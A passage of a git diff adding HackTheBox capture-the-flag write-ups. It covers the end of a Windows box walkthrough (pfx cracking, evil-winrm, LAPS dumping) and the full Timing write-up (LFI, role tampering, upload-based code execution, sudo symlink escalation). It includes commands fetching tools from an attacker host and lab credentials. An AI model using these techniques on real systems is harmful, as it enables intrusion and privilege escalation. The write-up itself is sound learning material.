[ibm.com](https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file)). To do so, I use the following commands: + + +```bash +openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out prv.key +openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt +``` +Problem: the certificate is also protected by a password. I test the password previously found, but without success. Once again we will have to use john to brute force the password. First I get the hash with the following command: + + +```bash +pfx2john legacyy_dev_auth.pfx > hashbis +``` +Then I launch the dictionary attack with john : + +![](img/image-5.webp) + +I find the password `thuglegacy`, I can now extract the private key and the certificate. I then test to connect to the machine with these two files for authentication. For that I use `evil-winrm` with the following command: + + +```bash +evil-winrm -i 10.129.188.205 -S -c cert.crt -k prv.key -p -u +``` +![](img/image-6.webp) + +I now have a shell with the `legacyy` user and I can get the first flag. + + +```bash +*Evil-WinRM* PS C:\Users\legacyy\Desktop> more user.txt +6a29afecacdabd66d286759e1f1379ff +``` +## Privilege escalation + +For the elevation of privilege I start by uploding winPEAS then I execute it : + + +```bash +powershell "Invoke-WebRequest -UseBasicParsing 10.10.14.173/winPEASx64.exe -OutFile winPEASx64.exe" +./winPEASx64.exe +``` +In the result of the program, I find that a file containing a command history exists on the machine: + +![](img/image-7.webp) + +I get it on my machine with the following command: + + +```bash +download C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt +``` + +```bash +whoami +ipconfig /all +netstat -ano |select-string LIST +$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck +$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force +$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) +invoke-command -computername localhost -credential $c -port 5986 -usessl - +SessionOption $so -scriptblock {whoami} +get-aduser -filter * -properties * +exit +``` +Looking at the contents of the file I find a user and his password! + +Another thing that winPEAS teaches me is that the user svc\_deploy has the right to read the LAPS passwords attribute! + + +> The "Local Administrator Password Solution" (LAPS) provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory (AD) and protected by ACL, so only eligible users can read it or request its reset. + +So I try to do it with the [LAPSDumper](https://github.com/n00py/LAPSDumper/blob/main/laps.py) script with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ python3 Windows/laps.py -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d timelapse.htb +DC01$:J3V}8QBsB4Q6+jgveai$7}}M +``` +The script finds the administrator password of the machine! I can now connect with the following command: + + +```bash +evil-winrm -i 10.129.188.205 -S -u Administrator -p 'J3V}8QBsB4Q6+jgveai$7}}M' +``` +![](img/image-8.webp) + +I now have a shell as Administrator and I can retrieve the last flag. + + +```powershell +*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt +09cec1f63345aa18fcf4bd05b9be6714 +``` +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not allow SMB shares containing important files to be accessed by unidentified users +- Do not use weak passwords to protect certificates +- Do not leave files with clear passwords diff --git a/content/writeup-ctf/writeup-timing-htb/featured.png b/content/writeup-ctf/writeup-timing-htb/featured.png new file mode 100644 index 0000000..cdb9d1e --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d5214522a0e948f393873d7f89f8f01ea16402e449ee2b398c88fe21f9e720b6 +size 295158 diff --git a/content/writeup-ctf/writeup-timing-htb/featured.webp b/content/writeup-ctf/writeup-timing-htb/featured.webp new file mode 100644 index 0000000..8adc1c8 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e79d340fc672ee104f27ee1e6e345a5e503cdc4d22a4241ceb4bb9ded199c631 +size 30224 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-1.png b/content/writeup-ctf/writeup-timing-htb/img/image-1.png new file mode 100644 index 0000000..9c77084 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a73bcfdce2c626424c8428bb85b3d2598881aaa9bc3ab24009ae5a9e2519259 +size 36941 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-1.webp b/content/writeup-ctf/writeup-timing-htb/img/image-1.webp new file mode 100644 index 0000000..5cfde10 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:11f04dd410ca3ed966926c2c05cdbae1deaedd097a4ca050f465d67537296a05 +size 31878 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-10.png b/content/writeup-ctf/writeup-timing-htb/img/image-10.png new file mode 100644 index 0000000..cc71754 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:04ec28497b45f522d242822d58fd181a01967ba2a6fa2e7b9a7f5773e2924804 +size 12603 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-10.webp b/content/writeup-ctf/writeup-timing-htb/img/image-10.webp new file mode 100644 index 0000000..632eaa2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:449c6198d69d1566f5a0b853d3cf1eb7a6a32498ed05e4a85a87065de88460db +size 13516 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-11.png b/content/writeup-ctf/writeup-timing-htb/img/image-11.png new file mode 100644 index 0000000..7e0ff72 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a44e150d690e7642d8f47e0f3e19b9210090ec7883effe2835ccd2efbd6dfe43 +size 14679 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-11.webp b/content/writeup-ctf/writeup-timing-htb/img/image-11.webp new file mode 100644 index 0000000..9d3aa55 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:28510e5978ea711decd2e402e9b61491d5f3d2d82c53b07f7c5c2d1433128613 +size 15110 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-12.png b/content/writeup-ctf/writeup-timing-htb/img/image-12.png new file mode 100644 index 0000000..6e02d05 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:860df4878701a6064ee47746b5af5f2ed77850950aa076144f86270d94f9d9c0 +size 23361 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-12.webp b/content/writeup-ctf/writeup-timing-htb/img/image-12.webp new file mode 100644 index 0000000..ee63e7c --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f94581c7acf5dd453be8cb1cdeec15d72918d667fa3a13219f64bf2a2cc20b11 +size 23832 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-13.png b/content/writeup-ctf/writeup-timing-htb/img/image-13.png new file mode 100644 index 0000000..e47dd28 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f9966e958c81f182b8c9800c97b6bc04a0f646bd7a33ba153d05c23d1c7dcb4 +size 23879 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-13.webp b/content/writeup-ctf/writeup-timing-htb/img/image-13.webp new file mode 100644 index 0000000..96de4f2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b3c32a8139baf5b0b50e56e9decd398e6d3a1513e5091d0bfdf7467e59736a8 +size 19850 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-14.png b/content/writeup-ctf/writeup-timing-htb/img/image-14.png new file mode 100644 index 0000000..fbcd453 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7efe3dbcb31cb9c2f8ab550ab5549210e0411975305e640dd209c2b8d7b235e4 +size 38836 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-14.webp b/content/writeup-ctf/writeup-timing-htb/img/image-14.webp new file mode 100644 index 0000000..ac148b2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:163dc82507c3a415523eddf8ba53822c08082abe49d0be0f9bffd1521e8430f8 +size 34388 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-15.png b/content/writeup-ctf/writeup-timing-htb/img/image-15.png new file mode 100644 index 0000000..bde166a --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:335c2fadf89b73a80fc29a9e426f43f355f227c795ff2d93eaef9f307fc368f5 +size 59756 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-15.webp b/content/writeup-ctf/writeup-timing-htb/img/image-15.webp new file mode 100644 index 0000000..bc29497 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dae7ebfe9ae7c481291b01bc8b96fca53b244b537bbb383d42cc8ad16791326c +size 52702 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-16.png b/content/writeup-ctf/writeup-timing-htb/img/image-16.png new file mode 100644 index 0000000..30e320b --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:082d9627a4a4f864eb88a7c2235eea6a6b05e381a6df43b03e946d91b4042a4f +size 14924 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-16.webp b/content/writeup-ctf/writeup-timing-htb/img/image-16.webp new file mode 100644 index 0000000..580cbd3 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-16.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d1ec36813471a1a69450551fb7cf382f141198baf715e02a3a7fde328fa51ad +size 17644 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-17.png b/content/writeup-ctf/writeup-timing-htb/img/image-17.png new file mode 100644 index 0000000..f2ec880 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-17.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c907e51f1cef18dd28af4287b6a39b90163d41b8082be034501e0a49ff4cfd6b +size 21008 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-17.webp b/content/writeup-ctf/writeup-timing-htb/img/image-17.webp new file mode 100644 index 0000000..6aa515b --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-17.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:987bc8f06149ea61fe0dcc500fb95b59043f3483cf8077cd6cdfce024db9452f +size 22906 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-18.png b/content/writeup-ctf/writeup-timing-htb/img/image-18.png new file mode 100644 index 0000000..c65e75f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-18.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:44c986583e28e1a780721e48f8d1cc0c1a1e74b0dd5dcf5beec6875c2b7ac798 +size 24291 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-18.webp b/content/writeup-ctf/writeup-timing-htb/img/image-18.webp new file mode 100644 index 0000000..3aa8f58 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-18.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76c1a59f02ecae9d24da819e902447f8bc13362baebf545806c3fd09e1ecb0be +size 36094 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-19.png b/content/writeup-ctf/writeup-timing-htb/img/image-19.png new file mode 100644 index 0000000..1f84c28 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-19.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a4dd4e370050a0fb224b9b1031283fa1aae007ff82eb791c1f9eb91df12856a1 +size 48350 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-19.webp b/content/writeup-ctf/writeup-timing-htb/img/image-19.webp new file mode 100644 index 0000000..adc41e3 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-19.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71b7f75aca43d539bdee6e38990671d192b81cc647b5374160468b90892234a1 +size 42062 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-2.png b/content/writeup-ctf/writeup-timing-htb/img/image-2.png new file mode 100644 index 0000000..4395fdf --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe335ed79874d2a603bb95fc8cad85abe6b8b899e39c4033e00f874d13735bd4 +size 41386 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-2.webp b/content/writeup-ctf/writeup-timing-htb/img/image-2.webp new file mode 100644 index 0000000..5c27dd4 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6de64fc8cbbd379528f4c0760467b15d1881cc768d512a2f7eb8d1ed97b3d561 +size 10532 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-20.png b/content/writeup-ctf/writeup-timing-htb/img/image-20.png new file mode 100644 index 0000000..ddedaee --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-20.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5113f34a0a50554ec236f0edfe17572115c3141bfcdd2396421b146ba17ee79d +size 20198 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-20.webp b/content/writeup-ctf/writeup-timing-htb/img/image-20.webp new file mode 100644 index 0000000..b271ab2 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-20.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2547e7fe4481043d9e61c7e97d26b10167ef1e375e74564d97f6d7d698d414e +size 21110 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-21.png b/content/writeup-ctf/writeup-timing-htb/img/image-21.png new file mode 100644 index 0000000..f77de4f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-21.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9be541c5bb6391741e51d205cb2a225e5817469773123925fc58da5bf59db226 +size 54120 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-21.webp b/content/writeup-ctf/writeup-timing-htb/img/image-21.webp new file mode 100644 index 0000000..99d6a88 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-21.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a382e45ead08775949d921736a4ed1fc47d5a1921ce72284b16b4c81dbdc4925 +size 49984 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-3.png b/content/writeup-ctf/writeup-timing-htb/img/image-3.png new file mode 100644 index 0000000..dac4ea9 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:809f6a931a1112321e07f72c3bcc9fe49edc452e4027c692fe3fe8ef730fb76e +size 101325 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-3.webp b/content/writeup-ctf/writeup-timing-htb/img/image-3.webp new file mode 100644 index 0000000..9e922e1 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2d95726d6bf27a02851764f1b3f5d1fa5441ca35551da9365ef1f127e15afdd7 +size 93320 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-4.png b/content/writeup-ctf/writeup-timing-htb/img/image-4.png new file mode 100644 index 0000000..16d53ae --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:66774f6abbd98e6a7b678f306e063ee8dc44dc43f2140bd8df69c6fac9666fb0 +size 43474 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-4.webp b/content/writeup-ctf/writeup-timing-htb/img/image-4.webp new file mode 100644 index 0000000..cac7fab --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53f21af41de8fede54af9dbf632552695e04305f52f86b1878114c8ef17d319b +size 35140 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-5.png b/content/writeup-ctf/writeup-timing-htb/img/image-5.png new file mode 100644 index 0000000..e209f19 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42b08ccb1d8b64c1a0de213e388c6cc5d51e17b78297fb8154e9f6e5fbbc4fc0 +size 8158 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-5.webp b/content/writeup-ctf/writeup-timing-htb/img/image-5.webp new file mode 100644 index 0000000..d1bed6f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff3177b0fdc858c855efc183499d0d3af20a016462245a723bffed22d08b60b1 +size 7294 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-6.png b/content/writeup-ctf/writeup-timing-htb/img/image-6.png new file mode 100644 index 0000000..042a061 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39f82af1221a5f7036651a6612bd42950f6b5c0912a4af73f3da964e7412fe7d +size 32550 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-6.webp b/content/writeup-ctf/writeup-timing-htb/img/image-6.webp new file mode 100644 index 0000000..7b30317 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7bca96a323be3797193ab4380fa92a20df129982c9a23f46aef7c8e06739c6d +size 34996 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-7.png b/content/writeup-ctf/writeup-timing-htb/img/image-7.png new file mode 100644 index 0000000..aef1754 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:911e549992d5ab38c8566d70ebfe5efde84de18d372d284f817d1a51020bfaa7 +size 13021 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-7.webp b/content/writeup-ctf/writeup-timing-htb/img/image-7.webp new file mode 100644 index 0000000..83202ec --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:babc10f58f506c89d01a3f002110c68b611314095ce427edb32076ad9872a87b +size 18628 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-8.png b/content/writeup-ctf/writeup-timing-htb/img/image-8.png new file mode 100644 index 0000000..93385da --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b7361ab102345339fe8c72c759407a6a4f6a09c2f15cfecab9ee68b1b97be48e +size 9986 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-8.webp b/content/writeup-ctf/writeup-timing-htb/img/image-8.webp new file mode 100644 index 0000000..8042c85 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d0c43d07d065dac385488c8cb3bfb42a110060f5b74e03b88dc306a80cdd1164 +size 8012 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-9.png b/content/writeup-ctf/writeup-timing-htb/img/image-9.png new file mode 100644 index 0000000..8bfc754 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfb37da41b615ff14a8382dbf6321cda83c267360a56e8157b7faceedbd5a136 +size 12839 diff --git a/content/writeup-ctf/writeup-timing-htb/img/image-9.webp b/content/writeup-ctf/writeup-timing-htb/img/image-9.webp new file mode 100644 index 0000000..8203558 --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec998496430dda523329b2f599bf5d9c192137f5697edaa03bbb04f9868e3cb7 +size 21126 diff --git a/content/writeup-ctf/writeup-timing-htb/index.md b/content/writeup-ctf/writeup-timing-htb/index.md new file mode 100644 index 0000000..4c9647f --- /dev/null +++ b/content/writeup-ctf/writeup-timing-htb/index.md @@ -0,0 +1,300 @@ +--- +title: "Writeup - Timing (HTB)" +date: 2022-04-07 +slug: "writeup-timing-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Timing](https://app.hackthebox.com/machines/Timing) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.135 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (Apache 2.4.49) + +![](img/image-2.webp) + +## Exploit + +First of all, let's start by listing the pages of the website. + +![](img/image-3.webp) + +When testing the different ones, they all return an error except the `image.php` page. Let's try to list the arguments available on this page with the following command: + + +```bash +ffuf -c -u http://10.10.11.135/image.php?FUZZ=/bin/bash -w wordlist/common.txt -fw 1 +``` +![](img/image-4.webp) + +We find that the `img` argument exists. Let's try to list the contents of the `/etc/passwd` : + +![](img/image-5.webp) + +The site has an injection detection, let's try to make a new request but this time with a base64 encoding to avoid the detection: + + +```bash +http://10.10.11.135/image.php?img=php://filter/convert.base64-encode/resource=/etc/passwd +``` +The page returns a character string in base64, I decode it with the following command: + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ echo "[string]" | base64 -d +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +games:x:5:60:games:/usr/games:/usr/sbin/nologin +man:x:6:12:man:/var/cache/man:/usr/sbin/nologin +lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin +mail:x:8:8:mail:/var/mail:/usr/sbin/nologin +news:x:9:9:news:/var/spool/news:/usr/sbin/nologin +uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin +proxy:x:13:13:proxy:/bin:/usr/sbin/nologin +www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin +backup:x:34:34:backup:/var/backups:/usr/sbin/nologin +list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin +irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin +gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin +nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin +systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin +systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin +syslog:x:102:106::/home/syslog:/usr/sbin/nologin +messagebus:x:103:107::/nonexistent:/usr/sbin/nologin +_apt:x:104:65534::/nonexistent:/usr/sbin/nologin +lxd:x:105:65534::/var/lib/lxd/:/bin/false +uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin +dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin +landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin +pollinate:x:109:1::/var/cache/pollinate:/bin/false +sshd:x:110:65534::/run/sshd:/usr/sbin/nologin +mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false +aaron:x:1000:1000:aaron:/home/aaron:/bin/bash +``` +We find that there is a user `aaron` on the machine. I try to connect to the site with this user and basic passwords.  I end up connecting with the following credentials: `user: aaron, password: aaron`. + +I continue my exploration of the files by starting with `login.php`. + +![](img/image-6.webp) + +In this file I find a reference to the database connection file: `db_conn.php`. + + +```bash +$pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd'); +``` +db\_conn.phpOk, we have a username and password for the mysql database and potentially a user... I tried to make an SSH session with this password and the user `aaron` but without success. + +I continue my research and find the mention of a new page in `upload.php` : `admin_auth_check.php`. + + +```php + +``` +In this file we find that if the session variable `role` is equal to 1 we have access to the admin section of the site. + +In one of the javascript files we find the existence of another php page : `profile_update.php`. + + +```php +function updateProfile() { + var xml = new XMLHttpRequest(); + xml.onreadystatechange = function () { + if (xml.readyState == 4 && xml.status == 200) { + document.getElementById("alert-profile-update").style.display = "block" + } + }; + + xml.open("POST", "profile_update.php", true); + xml.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); + xml.send("firstName=" + document.getElementById("firstName").value + "&lastName=" + document.getElementById("lastName").value + "&email=" + document.getElementById("email").value + "&company=" + document.getElementById("company").value); +} +``` +![](img/image-7.webp) + +In this file we find that we can send during a POST request the `role` variable. I create a request with Burp with `role=1`, this should give me access to the admin panel of the site. + +![](img/image-8.webp) + +I continue my analysis of the php files of the site with `avatar_uploader.php` which brings me then to `upload.php`. + + +```php + +``` +In this file we learn several things: + +- Only `.jpg` files are accepted +- The uploaded images are stored in the folder `images/uploards/` +- The images take a name based on the string `$file_hash` and the function time() + +💡In PHP single quotes are strings and double quotes are the values of the variable.So we will have to make a script to calculate the first part of the file name. I realize this script in PHP, every second it will give a possible hash to use for the name of the uploaded file. + + +```php +}} +Before doing the manipulation, it is necessary to check that your clock is well synchronized with the Internet (`timedatectl`). If this is not the case, you can activate it with the following command: `timedatectl set-ntp yes`.I create an image `d3vyce.jpg` with the following content: +{{< /alert >}} + +```php + +``` +I then run the php script : + +![](img/image-9.webp) + +Then I upload the image on the server. All that's left to do is to make requests with the different hash possibilities. + +![](img/image-10.webp) + +I can now send commands to the target server. It's not ideal, but I also tried with a reverse shell, but without success... + +![](img/image-11.webp) + +After some time of enumeration, I find a `source-files-backup.zip` file in the `/otp` folder. + +To recover this file, I make a copy to the folder where the website is stored: + + +```bash +curl 'http://10.10.11.135/image.php?img=images/uploads/0fdde4bab214a9a96630c16ac87bf0d4_d3vyce.jpg&cmd=cp+/opt/source-files-backup.zip+/var/www/html/' +``` +I can now retrieve the file by accessing the address `http://10.10.11.135/source-files-backup.zip`. After unzipping the zip I find the tree structure : + +![](img/image-12.webp) + +This is a GIT project, so I check the history with the following command: + +![](img/image-13.webp) + +In the last commit, there was a modification on the file in which we found credencials. Let's see what has been modified in this file: + +![](img/image-14.webp) + +There has been a password change! Let's try this new password to create an SSH session with the user `aaron`. + +![](img/image-15.webp) + +I now have a shell and can retrieve the first flag. + +## Privilege escalation + +For elevation of privilege I first check if the user has sudo access: + +![](img/image-16.webp) + +So I can use the `netutils` service with root rights. Let's see what this program does: + +![](img/image-17.webp) + +This program allows you to download files via FTP or HTTP. + +![](img/image-18.webp) + +Once the file is downloaded, I notice that it does not belong to me but to the root user! + +What we will be able to do is to make a symbolic link of the file `/root/.ssh/authorized_keys` and then upload a file with the same name so that the content is overwritten and replaced by our public key. + +To do this I create the symbolic link with the following command: + + +```bash +ln -s /root/.ssh/authorized_keys authorized_keys +``` +![](img/image-19.webp) + +Then before launching a file server in which I placed a file `authorized_keys` with my public key inside. + +I download the file with the program `netutils` : + +![](img/image-20.webp) + +I now connect to the root user via SSH : + +![](img/image-21.webp) + +I can now recover the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not use the same login/password +- Fix the php argument to avoid enumeration +- Do not use a user's password for the mysql database +- Do not give sudo rights to a program that does not need them diff --git a/content/writeup-ctf/writeup-undetected-htb/featured.png b/content/writeup-ctf/writeup-undetected-htb/featured.png new file mode 100644 index 0000000..d5f8ef6 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:963c8b49c308e3a4a1297e241445d9aaee00bfe2f32c04c253c5db6e1b41f027 +size 256365 diff --git a/content/writeup-ctf/writeup-undetected-htb/featured.webp b/content/writeup-ctf/writeup-undetected-htb/featured.webp new file mode 100644 index 0000000..51548f9 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 